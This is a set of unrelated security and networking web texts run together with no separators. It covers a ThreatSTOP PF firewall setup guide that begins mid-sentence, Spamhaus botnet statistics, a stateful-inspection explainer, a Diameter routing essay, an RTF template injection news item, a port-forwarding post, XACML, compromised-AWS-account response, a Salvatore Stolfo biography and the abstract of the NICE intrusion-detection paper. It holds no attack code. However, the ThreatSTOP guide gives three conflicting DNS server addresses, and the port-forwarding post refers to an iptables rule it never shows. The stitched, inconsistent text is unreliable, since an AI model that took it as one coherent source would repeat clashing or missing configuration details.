will use to build the tables. - BLOCK_FILE: Location and name of the file with IP addresses to block. - ALLOW_FILE: Location and name of the file with IP addresses to allow. - BLOCK_TABLE: The name of the PF table that will hold the IP address to block. - ALLOW_TABLE: The name of the PF table that will hold the IP addresses to allow. - RELOAD_PF: The script can automatically flush and reload the ThreatSTOP tables. - logfile: Temporary file used by the sendlog.sh script. - url: URL to upload the plain text output of the log file. Copy the configuration below to a file named “threatstop.conf” in the same directory where the download was extracted. ThreatSTOP Configuration file # Final location of the files PF will use for the tables OUT_DIR="/var/db" # ThreatSTOP DNS Servers # You can add or remove entries. Each server must be separated by a space DNS_SERVERS="22.214.171.124" # The block and/or allow list BLOCK_LIST=<block list name>.<ThreatSTOP account ID>.threatstop.local ALLOW_LIST=<allow list name>.<ThreatSTOP account ID>.threatstop.local # The name of the files pf will use for the tables BLOCK_FILE="$OUT_DIR/tsblock.txt" ALLOW_FILE="$OUT_DIR/tsallow.txt" # The name of the table for PF BLOCK_TABLE="ThreatSTOP" ALLOW_TABLE="ThreatSTOP-Allow" # Automatically reload PF after the files are created RELOAD_PF="YES" # # Options for the sendlog.sh script # # Location and name of the PF log file PFLOG="/var/log/pflog.0" # Name of the log file to upload. File is created # and deleted by the sendlog.sh script logfile="/tmp/pflog.txt" # URL to upload the logs to url=https://www.threatstop.com/cgi-bin/logupload.pl Before running the script it needs to be installed. There is a install.sh script that needs to be run. The script copies the threatstop-pf.sh, sendlog.sh, loguploadclient.pl, ptr.sed, and apl.sed to /usr/local/sbin. It copies the threatstop.conf file to /usr/local/etc. In order to have the block lists updated at regular intervals, it creates a cron job that will run the script every two hours. It also creates a job to run the sendlog.sh script to upload the log file every night at 1:00 AM. To have the logs uploaded on a daily basis, the script modifies the /etc/newssyslog.conf file so that the /var/log/pflog is rotated every night at 12:00 AM. In the newsyslog.conf file, it changes: /var/log/pflog 600 3 250 * ZB "pkill -HUP -u root -U root -t - -x pflogd" /var/log/pflog 600 3 * $D0 ZB "pkill -HUP -u root -U root -t - -x pflogd" As root, run the the “install.sh” script: ./install.sh /usr/local/sbin does not exist. Creating. Copying scripts to "/usr/local/sbin" Copying configuration file to "/usr/local/etc" Adding crontab entry to run the "threatstop-pf.sh" script every 2 hours and upload the log file with the "sendlog.sh" script every day at 1:00 AM Backing up original crontab to "crontab.original" Changing the newsyslog.conf file to rotate pflog every day at 12:00 AM Creating backup of newsyslog.conf Before running the main script to get your block lists and create the files, we need to make sure that your block lists are ready. We have included the “test.sh” script that you can run to make sure everything is ready. If the test does not work within an hour of creating your device, please contact support for assistance. ./test.sh DNS Server 126.96.36.199 is ready. The test was successful. You are now ready to run the threatstop-pf.sh script. After making sure the test script works, you can now run the main script, threatstop-pf.sh. The script gets your block lists and creates the files that PF can use to populate a table. The files are saved to /var/db. In order for PF to load any updates to the ThreatSTOP lists, PF needs to flush and reload the table. In the configuration file, there is an option to reload PF after the block lists have been downloaded. The commands that are run to do this are: # threatstop-pf.sh Starting ThreatSTOP v1.3 update on Fri Aug 12 07:42:05 PDT 2016 Using DNS Server 188.8.131.52 Processing allow list <allow list name>.<ThreatSTOP account ID>.threatstop.local Processing block list <block list name>.<ThreatSTOP account ID>.threatstop.local Completed getting all the lists Adding 26424 blocked addresses Adding 3 allowed addresses Reloading pf...done Finished ThreatSTOP update at Fri Aug 12 07:42:15 PDT 2016 Run Length: 0 hour(s) 0 minute(s) 10 second(s) This will create the files “tsblock.txt” and tsallow.txt” in the /var/db directory. Once the files containing the addresses to block are created, you will need to configure PF to use the file as a table. In the /etc/pf.conf file, add the table definition: table <ThreatSTOP> persist file "/var/db/tsblock.txt" table <ThreatSTOP-Allow> persist file "/var/db/tsallow.txt" With the table defined, you can create the rules to block traffic to and from the addresses in the table. We recommend that the rules to block the ThreatSTOP table be placed before any rules that allow incoming or outgoing traffic. The “quick” directive tells PF to treat the rule as the last matching rule. Any rules after it are not evaluated. pass in quick from <ThreatSTOP-Allow> pass out quick to <ThreatSTOP-Allow> block drop in log quick from <ThreatSTOP> block drop out log quick to <ThreatSTOP> After you make the changes to the /etc/pf.conf file, PF will need to be reloaded to read the updated configuration: /sbin/pfctl -f /etc/pf.conf To view the addresses in the table, run the command: # pfctl -T show -t ThreatSTOP # pfctl -T show -t ThreatSTOP-Allow To view the updated rules, run the command: /sbin/pfctl -s rules Sending Your Logs We have a log parsing feature where we can take your firewall log, parse it and compare the source and destination IP addresses to what is in our database. You can then login to our website and see the results. This allows you, and us, to see how effective we are in protecting your network infrastructure. The log file written by PF is in binary format and must be converted before it is sent to ThreatSTOP. We have included a script that converts the log to plain text and uploads the file to the secure ThreatSTOP website. The installation script has already configured your system to run the sendlog.sh script every night at 1:00 AM. If you would like to upload a log now, run the following command as root: /usr/local/sbin/sendlog.sh Log file uploaded successfully Restore to Previous State If you decide to return to your pre-ThreatSTOP configuration, you will need to perform the following actions to disable and remove ThreatSTOP from your system: - Stop the VM from updating the firewall by deleting the user crontab: - Remove the ThreatSTOP address groups from the policies using them (or delete the policies completely). - Delete the ThreatSTOP address groups (TSBlock-(number) and TSAllow-(number)).
2016 was the “year of extortion”, according to the non-profit spam-fighting project, Spamhaus, which saw unprecedented growth in servers dedicated to hosting ransomware. The Locky, CryptoWall, TeslaCrypt and TorrentLocker variants of ransomware collectively had at least 1,162 command and control (C&C) servers used to communicate with networks of infected PCs, otherwise known as botnets, according to Spamhaus' figures for 2016. These families’ infrastructure represented 16 percent of the 7,314 servers on the Spamhaus block list (SBL) in 2016, which contains internet protocol (IP) addresses it recommends not to accept email from. The list, comprised of hacked and dedicated cybercrime servers, is shared with ISPs, hosting providers and other large network operators to protect email users from major sources of spam. According to Spamhaus, the SBL shrank 14 percent, from 8,480 IP addresses in 2015, closer to the list’s total in 2014, at 7,182 IP addresses. However, the group’s other database, the Botnet Controller List (BCL), which is comprised only of servers known to exclusively support cybercriminal activity, grew 12 percent in 2016 to 4,481, from 4,009 in 2015. The BCL is used to block all incoming and outbound traffic from malicious servers. Besides ransomware, banking trojans dominated last year's malware, including the Zeus, Gozi and Dridex families. Appearing for the first time were 393 servers dedicated to controlling compromised Internet of Things devices, which were used to control compromised devices behind last year’s record-breaking distributed denial of service (DDoS) attacks attributed to Mirai malware. A smaller SBL might indicate a shrinking cybercrime footprint, but Spamhaus contends the decline was due to botnet operators moving C&C servers to the dark web or hidden services, which are protected primarily by The Onion Router (Tor) anonymization network. Using Tor to hide a botnet isn’t new, however it’s rising popularity among cybercriminals may soon threaten Tor's viability as a legitimate privacy tool, warns Spamhaus. Tor can be used to dodge surveillance efforts to track the IP address a person uses when accessing websites. The problem, argues Spamhaus, is that it’s impossible for network operators to filter benign from malicious Tor traffic, so there may come a time when operators are forced to block all Tor traffic. This could impact privacy-focussed email providers like ProtonMail. “Due to the nature of such anonymization networks, it is impossible to easily block certain content hosted in the dark web (e.g. botnet controllers), nor to identify the final target of a C&C communication (e.g. where the malware is sending the stolen data, such as credentials or credit card details, to),” writes the Spamhaus project. “From the perspective of a network operator, the only way to prevent abuse from anonymization networks is to block them entirely, which can be a difficult choice as there are also legitimate uses for them. We believe that ISPs and hosting providers will be confronted in the near future with the question of whether to allow the use of anonymization services such as Tor or to block them completely, unless operators of anonymization services step up to stop abusers in a more effective way.” According to Spamhaus, cybercriminals build C&C infrastructure through two main channels, including hacking web servers using flaws in web content management systems, such as WordPress and Joomla, as well as fraudulently signing up to ISPs or hosting providers in order to rent server capacity. The provider hosting the most malicious servers in Spamhaus' database was French ISP OVH, with 395 C&C servers, followed by US hosting provider, GoDaddy, with 257. OVH also hosted the most servers that were acquired through fraudulent sign-ups throughout 2016.
What is stateful inspection in networking? Stateful inspection, also known as dynamic packet filtering, is a firewall technology that monitors the state of active connections and uses this information to determine which network packets to allow through the firewall. Stateful inspection is commonly used in place of stateless inspection, or static packet filtering, and is well suited to Transmission Control Protocol (TCP) and similar protocols, although it can also support protocols such as User Datagram Protocol (UDP). Stateful inspection is a network firewall technology used to filter data packets based on state and context. Check Point Software Technologies developed the technique in the early 1990s to address the limitations of stateless inspection. Stateful inspection has since emerged as an industry standard and is now one of the most common firewall technologies in use today. Stateful inspection operates primarily at the transport and network layers of the Open Systems Interconnection (OSI) model for how applications communicate over a network, although it can also examine application layer traffic, if only to a limited degree. Packet filtering is based on the state and context information that the firewall derives from a session's packets: - State. The state of the connection, as it's specified in the session packets. In TCP, for example, the state is reflected in specific flags, such as SYN, ACK and FIN. The firewall stores state information in a table and updates the information regularly. - Context. Information such as source and destination Internet Protocol (IP) addresses and ports, sequence numbers and other types of metadata. The firewall also stores context information and updates it regularly. By tracking both state and context information, stateful inspection can provide a greater degree of security than with earlier approaches to firewall protection. The stateful firewall inspects incoming traffic at multiple layers in the network stack, while providing more granular control over how traffic is filtered. The firewall can also compare inbound and outbound packets against the stored session data to assess communication attempts. What are stateful and stateless inspection? Stateful inspection has largely replaced stateless inspection, an older technology that checks only the packet headers. The stateless firewall uses predefined rules to determine whether a packet should be permitted or denied. It relies on only the most basic information, such as source and destination IP addresses and port numbers, and never looks past the packet's header, making it easier for attackers to penetrate the perimeter. For example, an attacker could pass malicious data through the firewall simply by indicating "reply" in the header. Stateful inspection can monitor much more information about network packets, making it possible to detect threats that a stateless firewall would miss. A stateful firewall maintains context across all its current sessions, rather than treating each packet as an isolated entity, as is the case with a stateless firewall. However, a stateful firewall requires more processing and memory resources to maintain the session data, and it's more susceptible to certain types of attacks, including denial of service. With stateless inspection, lookup operations have much less of an impact on processor and memory resources, resulting in faster performance even if traffic is heavy. That said, a stateless firewall is more interested in classifying data packets than inspecting them, treating each packet in isolation without the session context that comes with stateful inspection. This also results in less filtering capabilities and greater vulnerability to other types of network attacks. How does stateful inspection work? Stateful inspection monitors communications packets over a period of time and examines both incoming and outgoing packets. The firewall tracks outgoing packets that request specific types of incoming packets and allows incoming packets to pass through only if they constitute a proper response. A stateful firewall monitors all sessions and verifies all packets, although the process it uses can vary depending on the firewall technology and the communication protocol being used. For example, when the protocol is TCP, the firewall captures a packet's state and context information and compares it to the existing session data. If a matching entry already exists, the packet is allowed to pass through the firewall. If no match is found, the packet must then undergo specific policy checks. At that point, if the packet meets the policy requirements, the firewall assumes that it's for a new connection and stores the session data in the appropriate tables. It then permits the packet to pass. If the packet doesn't meet the policy requirements, the packet is rejected. The process works a little differently for UDP and similar protocols. Unlike TCP, UDP is a connectionless protocol, so the firewall cannot rely on the types of state flags inherent to TCP. Instead, it must use context information, such as IP addresses and port numbers, along with other types of data. In effect, the firewall takes a pseudo-stateful approach to approximate what it can achieve with TCP. In a firewall that uses stateful inspection, the network administrator can set the parameters to meet specific needs. For example, an administrator might enable logging, block specific types of IP traffic or limit the number of connections to or from a single computer. In a typical network, ports are closed unless an incoming packet requests connection to a specific port and then only that port is opened. This practice prevents port scanning, a well-known hacking technique.
To begin, we should ask what are the intended functionalities of a Diameter Routing Agent (DRA) and a Policy Charging & Rules Function (PCRF). A PCRF is the Policy Decision Point (PDP) virtually cut-and-pasted into IMS and afterwards taken by the 3GPP who awarded it with a new acronym based on the older concept of policy based networking. It is a place where business rules are merged with network actor information (in the case of mobile, subscribers). It acts as a centralized engine for deploying policy to enforcement points in a specific, limited domain (in the case of mobile, usually a MSC, APN, or geographic region). In theory, upstream from the PCRF the business rules themselves are stored in a rules base (the SPR), and the user information is stored in a directory (the HSS or UPSF) and the execution of the policy (rules+user+context) is done downstream by policy enforcement points. However, this theory isn’t always strictly translated to practice. A DRA is a message switching engine that acts on a peer-to-peer network to perform proxy, translation, routing, and relay actions against messages. This is analogous to how the packet switching engine in a network element performs proxy, translation, routing, and relay actions against Ethernet/IP frames (L2-4) but it is performed on the L7 Diameter message in the context of the named interface application. It is deployed as a strategic point of control to direct Diameter message delivery in the EPC and IMS control plane; facilitates message-proxy, horizontal scaling for control plane elements that cannot scale (load balancing); provides virtual end-points to secure and simplify external communications (virtual servers /DEA); enhances interoperability by performing translation (interop fix-up); bridges between 3GPP and Web 2.0 messaging and architectures; and creates mechanisms for the capture, distribution of, and action on information contained in messages across domains or subsystems in the EPC and IMS (the message switching stratum). So, given those definitions, should the function of a DRA be separate from the PCRF function? Firstly, they don’t have anything to do with one another other than they are both Diameter peers. Another way to think of it is to ask why would someone separate the routing and switching function from the SMTP and IMAP function? They both use TCP/IP, so why not put them in the same sheet metal? Deploying a DRA as part of an EPC or IMS functional element is like deploying a L3 switch as the NIC for a server; there isn’t anything wrong with doing that, but you’d better have a way to justify the cost and tame the operational complexity of doing that if all you really need is a NIC. Secondly, the PCRF is part of the Policy Control and Charging (PCC) subsystem and the Integrated Multimedia Subsystem (IMS). Those are only two functional domains in the EPC and IMS, so by integrating the DRA into the PCRF you’ve created a hurdle to provisioning that function in the Mobility subsystem, the roaming subsystem/internetworking function, the integration of fixed access, and the visibility and reporting subsystems necessary to actually operate the packet core. Thirdly, by choosing an embedded DRA over a message switching stratum for the EPC control plane, the operator is hitching scalability embedded in the DRA function to the expandability of the rest of those functional elements. This is the same conundrum that the dynamic datacenter faces when trying to embed ADC functionality into the elastic compute node; these two functions have different scaling metrics, different utilization curves, and different scaling requirements. Just like OpenFlow and network virtualization doesn’t solve that for the cloud, there isn’t a viable solution for the elastic packet core. Finally, when you don’t have a message switching stratum in the EPC control plane (that also extends to the VoLTE functions of the IMS core), you lack a mechanism to apply policy end-to-end on the network, or to deploy offerings that extend policy to roaming customers to enhance value because you don’t have a message switching stratum. Instead you have a heterogeneous mix of DRA-like functionalities that may or may not interoperate in a way that can be operationalized, some of which are controlled by the vendor of the function who has a vested interest in not participating in an end-to-end policy architecture. Put another way, operators who are content to become commoditized dumb pipes shouldn’t deploy embedded DRA functionality in their EPC functional elements, because they aren’t going to operationalize or monetize their networks with policy based networking driven product offerings. All they really need is a Diameter stack with a static configuration to maximize the fixed configuration economics required for commodity access providers. Conversely, operators that do intend to pursue value above connectivity should invest in a message switching stratum, because they cannot currently deploy the DevOps apparatus required to tame the operational complexity associated with managing embedded DRA elements in a high capacity dynamic heterogeneous network to deliver policy based offerings that customers will pay extra for (because such an apparatus does not currently exist). Vendors and system integrators will maximize their short-term revenue by selling integrated DRA function at premium rate. And by doing so, they ensure that functional systems are forced to scale in the least cost-effective way as traffic increases. However, they do so with the risk that their solution will be pre-maturely re-evaluated when the need to deploy a message switching stratum arises.
Hackers Are Using RTF Files in Phishing Campaigns Hackers are increasingly using an RTF template injection technique to phish for information from victims. Three APT hacking groups from India, Russia, and China, used a novel RTF template injection technique in their recent phishing campaigns. Researchers at Proofpoint first spotted the malicious RTF template injections in March 2021, and the firm expects it to become more widely used as time goes on. Here’s what’s happening, according to Proofpoint: This technique, referred to as RTF template injection, leverages the legitimate RTF template functionality. It subverts the plain text document formatting properties of an RTF file and allows the retrieval of a URL resource instead of a file resource via an RTF’s template control word capability. This enables a threat actor to replace a legitimate file destination with a URL from which a remote payload may be retrieved. To put it simply, threat actors are placing malicious URLs in the RTF file through the template function, which can then load malicious payloads into an application or perform Windows New Technology LAN Manager (NTLM) authentication against a remote URL to steal Windows credentials, which could be disastrous for the user who opens these files. Where things get really scary is that these have a lower detection rate by antivirus apps when compared to the well-known Office-based template injection technique. That means you might download the RTF file, run it through an antivirus app and think it’s safe when it’s hiding something sinister. So what can you do to avoid it? Simply don’t download and open RTF files (or any other files, really) from people you don’t know. If something seems suspicious, it probably is. Be careful what you download, and you can mitigate the risk of these RTF template injection attacks.
In an organistaion some times we need to expose some of the internal services to the outer world.If the System Administrator need to access the remote windows machine ,vnc etc .. from the outer network what we will do? Port forwarding is best option to bypass the gateway. Ensure the security setting while forwarding the port address. Public ip address is configured on the gateway and is set as nat routing. Nat routing help internal users to access the outer world. Internal user request (eg ; http , ftp ,port address)will send to the gateway and from gateway it is send to ‘www’. Outer world can only access the internal network using the help of System Administrator. He create wise routing rules on the gateway to make access to outer world with out compromising security of the internal network, server, etc.. . Here i am going explaining the port forwarding using iptable commands, expose an internal windows remote to outside gateway. The command used to port forward the request from public to internal as follows, This iptable rule will forward the vncviewer port request from the public ip address to the internal vnc server machine port. Make sure to give a good secure password to prevent the machine from hacking. 1. Edit the file inside the apf installation directory, # vi /etc/apf/preroute.rules Add the same iptables rule into the file and reload the apf. Make changes to the iptables port forwarding rule according to your need. 2. Reload the apf to make the port forwarding rule to make effective. # apf -r Latest posts by Melbin Mathew (see all) - VMware virtual IDE to virtual SCSI hard disk conversion steps – Windows XP - August 6, 2015 - Stop Error “CRITICAL_STRUCTURE_CORRUPTION - August 5, 2015 - Error installing Windows server role and feature required for the Exchange 2010 - December 3, 2013
The eXtensible Access Control Markup Language (XACML) is an XML dialect for the server-side representation of access control policy and access control decisions. These rules can be expressed in an application-independent manner, making it versatile. XACML polices can reference other policies, and can intelligently combine policies with competing or overlapping rule sets. If the provided combination algorithms are not sufficient, application developers can define their own as needed. XACML can be used to implement Attribute Based Access Control (ABAC). Traditional access control methods such as Identity Based Access Control (IBAC), or the newer Role Based Access Control (RBAC), associate access permissions directly with a subject identity, or with the role that subject is attempting to perform. IBAC, in which an access policy needs to be defined for every identity, is a method which does not scale well and is repetitive and redundant. RBAC requires that access policies be defined for all roles in the system,and then subject identities are mapped to those roles. This scales better,but still has limitations from this one-dimensional view. RBAC generally requires a centralized management of the user-to-role and permission-to-role assignments, which is not well suited to a highly distributed environment, or to an environment with subjects and resources belonging to different security domains. ABAC is a newer method in which policy rules are defined on attributes of subjects (users, applications, processes, etc.), resources (web service,data, etc.), and environment (time, threat level, security classification,etc.). This allows for a much finer-grained access control policy than what can be achieved with RBAC. Of particular note is the ability to use security classification labels to create rules, allowing for XACML policies to be used in conjunction with the needs for a secure operating system’s Mandatory Access Control (MAC) system. ViewDS Directory supports the X.500 Basic and Simplified Access Control schemes, which offer fine grained authorization controls that generally apply to identities directly or groups of identities. ViewDS Directory provides extensions to the fine grained X.500 access control models to allow uses to be identified through Roles, or more generally through any Attribute associated with identities. Through ViewDS Directory’s support for XML, XACML policies can be stored, validated and indexed within a ViewDS Directory server. This allows ViewDS Directory to be used as a Policy Administration Point (PAP) and Policy Information Point (PIP) by XACML Policy Decision Point (PDP) software.
The benefits of cloud adoption are clear: greater speed, agility and efficiency. But it also comes with new challenges,... By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. and a single security breach can quickly shut down an entire business. The accessibility of public cloud opens the door for the exploitation of insecure infrastructure access points. That makes it increasingly difficult -- and important -- to protect data and workloads, as industries become more and more dependent on the cloud. Compromised AWS accounts are highly dangerous for enterprises. Whatever the cause -- external hacking or a disgruntled employee -- the first order of business is to isolate the affected AWS accounts and minimize damage before it is too late. Negate the damage of hacked AWS accounts If you have a compromised AWS Identity and Access Management (IAM) user account, immediately disable its access and privileges. Follow this step-by-step procedure: - Go to the IAM console, and detach all policies connected to the user. This halts that user from making any further action if he or she is already logged in to the web console. - Next, go to the Security credentials tab, and disable the account's console password and access keys. - After you stop the compromised account from causing more harm, assess the damage already done. If the user deleted data, it is most likely lost forever -- unless you have backups. But if the user started some resources -- to cause financial damage, for example -- you should immediately locate and stop them. AWS CloudTrail helps with this, as it provides logs and visibility into all API calls a user makes. This helps administrators track down changes in their infrastructure if, for example, the attacker opened a port in a security group for later exploitation. - Next, make sure you check and rotate all of your AWS credentials. Also, be sure to assess Active Directory or Lightweight Directory Access Protocol if applicable. CloudTrail can help identify which AWS accounts are compromised, so make sure to enable CloudTrail logging to contain the attack and perform the post-mortem analysis. If an AWS root account is compromised, you have a much more significant problem. If the attacker gained access to the root account and changed the password, contact AWS support, and wait for a specialist to retrieve your account, which could take up to 24 to 48 hours. During that time, you should review the best practices to secure your account, because there's not much else you can do. Use best practices to boost your AWS security Boost AWS security with multifactor authentication Use IAM to gain control over multiple AWS accounts Dig Deeper on AWS compliance, governance, privacy and regulations Related Q&A from Ofir Nachmani AWS users in the US-East-1 region have seen a string of outages in the last few years. But does that mean they shouldn't deploy workloads there?continue reading Reserved Instances save IT teams money on compute resources but lock them into a particular type of instance. How do Convertible RIs differ, and what...continue reading Our environment has multiple AWS accounts for different dev stages. How can we use the IAM cross-account feature to share resources across accounts?continue reading Have a question for an expert? Please add a title for your question Get answers from a TechTarget expert on whatever's puzzling you.
Salvatore J. Stolfo Born in Brooklyn, New York, Stolfo received a Bachelor of Science degree in Computer Science and Mathematics from Brooklyn College in 1974. He received his Ph.D. from NYU Courant Institute in 1979 and has been on the faculty of Columbia ever since, where he's taught courses in Artificial Intelligence, Intrusion and Anomaly Detection Systems, Introduction to Programming, Fundamental Algorithms, Data Structures, and Knowledge-Based Expert Systems. While at Columbia, Stolfo has received close to $50M in funding for research that has broadly focused on Security, Intrusion Detection, Anomaly Detection, Machine Learning and includes early work in parallel computing and artificial intelligence. He has published or co-authored over 250 papers and has over 21,000 citations with an H-index of 67. In 1996 he proposed a project with DARPA that applies machine learning to behavioral patterns to detect fraud or intrusion in networks. Among his earliest work, Stolfo along with colleague Greg Vesonder of Bell Labs, developed a large-scale expert data analysis system, called ACE (Automated Cable Expertise) for the nation's phone system. AT&T Bell Labs distributed ACE to a number of telephone wire centers to improve the management and scheduling of repairs in the local loop. Stolfo coined the term FOG computing (not to be confused with fog computing) where technology is used “to launch disinformation attacks against malicious insiders, preventing them from distinguishing the real sensitive customer data from fake worthless data.” He was elevated to IEEE Fellow in 2018 "for his contributions to machine learning based cybersecurity." Founded in 2011, Red Balloon Security (or RBS) is a cyber security company founded by Dr Sal Stolfo and Dr Ang Cui. A spinout from the IDS lab, RBS developed a symbiote technology called FRAK as a host defense for embedded systems under the sponsorship of DARPA's Cyber Fast Track program. Created based on their IDS lab research for the DARPA Active Authentication and the Anomaly Detection at Multiple Scales program, Dr Sal Stolfo and Dr. Angelos Keromytis founded Allure Security Technologies. Using active behavioral authentication and decoy technology Stolfo pioneered and patented in 1996. Founded in 2009, Allure Security Technology was created based on work done under DARPA sponsorship in Columbia's IDS lab based on DARPA prompts to research how to detect hackers once they are inside an organization's perimeter and how to continuously authenticate a user without a password. Stolfo's company Electronic Digital Documents produced a “DataBlade” technology, which Informix marketed during their strategy of acquisition and development in the mid 80's. Stolfo's patented merge/purge technology called EDD DataCleanser DataBlade was licensed by Informix. Since its acquisition by IBM in 2005, IBM Informix is one of the world's most widely used database servers, with users ranging from the world's largest corporations to startups. System Detection was one of the companies founded by Prof. Stolfo to commercialize the Anomaly Detection technology developed in the IDS lab. The company ultimately reorganized and was rebranded as Trusted Computer Solutions. That company was recently acquired by Raytheon. - "Professor Salvatore J. Stolfo". Cs.columbia.edu. 2015-02-09. Retrieved 2015-06-26. - "Recent Courses". Cs.columbia.edu. Retrieved 2015-06-26. - "Salvatore J. Stolfo CV" (PDF). Cs.columbia.edu. Retrieved 2015-06-26. - "Salvatore Stolfo - Google Scholar Citations". Retrieved 2015-07-01. - "Salvatore Stolfo - Google Scholar Citations". Retrieved 2015-06-26. - "The JAM Project: Fraud and Intrusion Detection Using Meta-learning Agents". Sneakers.cs.columbia.edu. Archived from the original on 2014-10-23. Retrieved 2015-06-26. - Strategic Computing: DARPA and the Quest for Machine Intelligence, 1983-1993, By Alex Roland, Philip Shiman, Pages 173-175. - Stolfo, Salvatore; Miranker, Daniel P. (1984). "DADO: A Parallel Processor for Expert Systems - Academic Commons". Academic Commons. Academiccommons.columbia.edu. doi:10.7916/D8F196VH. Retrieved 2015-08-05. - Waldes, Peter; Lustgarten, Janet; Stolfo, Salvatore (1985). "Are maintenance expert systems practical now? - Academic Commons". Academic Commons. Academiccommons.columbia.edu. doi:10.7916/D8WD481H. Retrieved 2015-07-01. - Stolfo, Salvatore J. (2012-05-25). "Fog Computing: Mitigating Insider Data Theft Attacks in the Cloud - Academic Commons". Academiccommons.columbia.edu. doi:10.1109/SPW.2012.19. Retrieved 2015-07-01. Cite journal requires - Stolfo, Salvatore J.; Stavrou, Angelos; Wright, Charles V. (2013-10-23). Research in Attacks, Intrusions, and Defenses: 16th International Symposium ... - Google Books. ISBN 9783642412844. Retrieved 2015-07-01. - "IEEE Computer Society Members Elevated to Fellow for 2018 | IEEE Computer Society". - 2019 ACM Fellows Recognized for Far-Reaching Accomplishments that Define the Digital Age, Association for Computing Machinery, retrieved 2019-12-11 - Mark Piesing. "Hacking attacks on printers still not being taken seriously | Technology". The Guardian. Retrieved 2015-07-01. - "Patent US8528091 - Methods, systems, and media for detecting covert malware - Google Patents". Retrieved 2015-07-01. - http://www.uspto.gov/web/patents/patog/week34/OG/html/1405-4/US08819825-20140826.html[permanent dead link] - "DARPA - Open Catalog". Archived from the original on 2015-07-11. Retrieved 2015-07-10. - Patent US8769684 - Methods, systems, and media for masquerade attack detection by monitoring ... - Google Patents - "Archived copy". Archived from the original on 2016-03-04. Retrieved 2015-06-29.CS1 maint: archived copy as title (link) - Matching Records in Multiple Databases Using a Hybridization of Several ... - Google Books - "Salvatore Joseph Stolfo - Nomination and Bio". Govinfo.library.unt.edu. Retrieved 2015-06-26. - Data Mining and Knowledge Discovery Handbook - Google Books - "CounterStorm, Inc.: Private Company Information - Businessweek". Investing.businessweek.com. 2008-09-05. Retrieved 2015-06-26. - Raytheon Company : Investor Relations : News Release
PREDICT MALICIOUS OR MISUSE BEHAVIORS Cybercriminals are becoming better organized, more sophisticated and highly skilled in their malicious attempts to exploit vulnerabilities and weaknesses. Because of this, organizations’ capability to predict malicious/misuse behaviors while containing their cybersecurity operational costs, is challenged on a daily basis. ClearSkies™ Big Data Advanced Security Analytics provides real-time, in-depth statistical, behavioral, predictive/machine learning security analytics. These tools help you identify suspicious cyberattack patterns and security anomalies, which would otherwise go undetected by conventional SIEM systems.
NICE: Network Intrusion Detection and Countermeasure Selection in Virtual Network Systems Cloud security is one of most important issues that has attracted a lot of research and development effort in past few years. Particularly, attackers can explore vulnerabilities of a cloud system and compromise virtual machines to deploy further large-scale Distributed Denial-of-Service (DDoS). DDoS attacks usually involve early stage actions such as multistep exploitation, low-frequency vulnerability scanning, and compromising identified vulnerable virtual machines as zombies, and finally DDoS attacks through the compromised zombies. Within the cloud system, especially the Infrastructure-as-a-Service (IaaS) clouds, the detection of zombie exploration attacks is extremely difficult. This is because cloud users may install vulnerable applications on their virtual machines. To prevent vulnerable virtual machines from being compromised in the cloud, we propose a multiphase distributed vulnerability detection, measurement, and countermeasure selection mechanism called NICE, which is built on attack graph-based analytical models and reconfigurable virtual network-based countermeasures. The proposed framework leverages OpenFlow network programming APIs to build a monitor and control plane over distributed programmable virtual switches to significantly improve attack detection and mitigate attack consequences. The system and security evaluations demonstrate the efficiency and effectiveness of the proposed solution. In traditional data centers, where system administrators have full control over the host machines, vulnerabilities can be detected and patched by the system administrator in a centralized manner. However, patching known security holes in cloud data centers, where cloud users usually have the privilege to control software installed on their managed VMs, may not work effectively and can violate the Service Level Agreement (SLA). Detecting malicious behavior Duan et al. focused on the detection of compromised machines that have been recruited to serve as spam zombies. Their approach, SPOT, is based on sequentially scanning outgoing messages while employing a statistical method Sequential Probability Ratio Test (SPRT), to quickly determine whether or not a host has been compromised. BotHunter detected compromised machines based on the fact that a thorough malware infection process has a number of well defined stages that allow correlating the intrusion alarms triggered by inbound traffic with resulting outgoing communication patterns. BotSniffer exploited uniform spatial-temporal behavior characteristics of compromised machines to detect zombies by grouping flows according to server connections and searching for similar behavior in the flow. An attack graph is able to represent a series of exploits, called atomic attacks, that lead to an undesirable state, for example a state where an attacker has obtained administrative access to a machine. There are many automation tools to construct attack graph. Binary Decision Diagrams (BDDs) O. Sheyner et al. proposed a technique based on a modified symbolic model checking NuSMV and Binary Decision Diagrams (BDDs) to construct attack graph. Their model can generate all possible attack paths, however, the scalability is a big issue for this solution. Intrusion Detection System IDS and firewall are widely used to monitor and detect suspicious events in the network. The false alarms and the large volume of raw alerts from IDS are two major problems for any IDS implementations. Many attack graph based alert correlation techniques have been proposed recently. L. Wang et al. devised an in-memory structure, called queue graph (QG), to trace alerts matching each exploit in the attack graph. The implicit correlations in this design make it difficult to use the correlated alerts in the graph for analysis of similar attack scenarios. Roschke et al. proposed a modified attack-graph-based correlation algorithm to create explicit correlations only by matching alerts to specific exploitation nodes in the attack graph with multiple mapping functions, and devised an alert dependencies graph (DG) to group related alerts with multiple correlation criteria. Attack countermeasure tree Roy et al. proposed an attack countermeasure tree (ACT) to consider attacks and countermeasures together in an attack tree structure. They devised several objective functions based on greedy and branch and bound techniques to minimize the number of countermeasure, reduce investment cost, and maximize the benefit from implementing a certain countermeasure set. In their design, each countermeasure optimization problem could be solved with and without probability assignments to the model. However, their solution focuses on a static attack scenario and predefined countermeasure for each attack. N. Poolsappasit et al. proposed a Bayesian attack graph (BAG) to address dynamic security risk management problem and applied a genetic algorithm to solve countermeasure optimization problem. NICE (Network Intrusion detection and Countermeasure sElection in virtual network systems) is proposed to establish a defense-in-depth intrusion detection framework. For better attack detection, NICE incorporates attack graph analytical procedures into the intrusion detection processes. The design of NICE does not intend to improve any of the existing intrusion detection algorithms; indeed, NICE employs a reconfigurable virtual networking approach to detect and counter the attempts to compromise VMs, thus preventing zombie VMs. Deploy a lightweight mirroring-based network intrusion detection agent (NICE-A) on each cloud server to capture and analyze cloud traffic. A NICE-A periodically scans the virtual system vulnerabilities within a cloud server to establish Scenario Attack Graph (SAGs), and then based on the severity of identified vulnerability towards the collaborative attack goals, NICE will decide whether or not to put a VM in network inspection state. Once a VM enters inspection state, Deep Packet Inspection (DPI) is applied, and/or virtual network reconfigurations can be deployed to the inspecting VM to make the potential attack behaviors prominent. By using software switching techniques, NICE constructs a mirroring-based traffic capturing framework to minimize the interference on users’ traffic compared to traditional bump-in-the-wire (i.e., proxy-based) IDS/IPS. NICE enables the cloud to establish inspection and quarantine modes for suspicious VMs according to their current vulnerability state in the current SAG. Based on the collective behavior of VMs in the SAG, NICE can 